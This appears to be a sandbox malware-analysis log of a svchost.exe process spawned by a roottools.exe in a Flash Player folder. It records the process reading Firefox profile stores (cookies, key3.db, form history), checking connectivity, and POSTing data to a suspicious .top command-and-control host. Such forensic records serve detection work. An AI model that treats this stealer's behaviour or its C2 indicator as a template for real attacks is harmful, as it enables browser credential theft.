File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cookies.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\downloads.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\extensions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\formhistory.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\healthreport.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\.metadata, protection = PAGE_READONLY, maximum_size = 0 False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\key3.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\localstore.rdf, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
For performance reasons, the remaining 2120 entries are omitted.
The remaining entries can be found in glog.xml.
Thread 0x7a8
(Host: 27, Network: 22)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = file_attributes True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, type = size, size_out = 171 True 1
Fn
Mutex Create mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107 True 1
Fn
File Copy source_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, destination_filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin, desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Mutex Release mutex_name = 61AB4C4AE08220DC5911D67B8EFCF107 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Time type = System Time, time = 2018-01-10 18:59:08 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY True 2
Fn
Data
System Get Info type = Hardware Information True 2
Fn
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = www.google.com, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close , url = www.google.com/ True 1
Fn
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 12
Fn
Data
Inet Read Response size = 4096, size_out = 639 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 176296 True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD, CLSCTX_NO_FAILURE_LOG True 6
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, type = size, size_out = 171 True 1
Fn
File Read filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp, size = 171, size_out = 171 True 1
Fn
Data
Inet Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Send HTTP Request headers = Connection: close ÉÄ, url = aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA False 1
Fn
Inet Send HTTP Request headers = Connection: close ÉÄ, url = aaopsjdf.top/9TzYkm/41IzC/N/hR/TcmU_ZLdnRSaLA True 1
Fn
Data
Inet Query HTTP Info flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 88 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
File Delete filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp True 1
Fn
System Sleep duration = 600000 milliseconds (600.000 seconds) False 1
Fn
Process #25: svchost.exe
(Host: 3702, Network: 0)
+
Information Value
ID #25
File Name c:\windows\syswow64\svchost.exe
Command Line C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory C:\Users\aETAdzjz\AppData\Roaming\
Monitor Start Time: 00:07:38, Reason: Child Process
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:02:35
OS Process Information
+
Information Value
PID 0x7e0
Parent PID 0x7e8 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x F4
0x 610
0x 654
0x 694
0x 414
0x 4D0
0x 7AC
0x 4BC
0x 3A4
0x 6B0
0x 46C
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
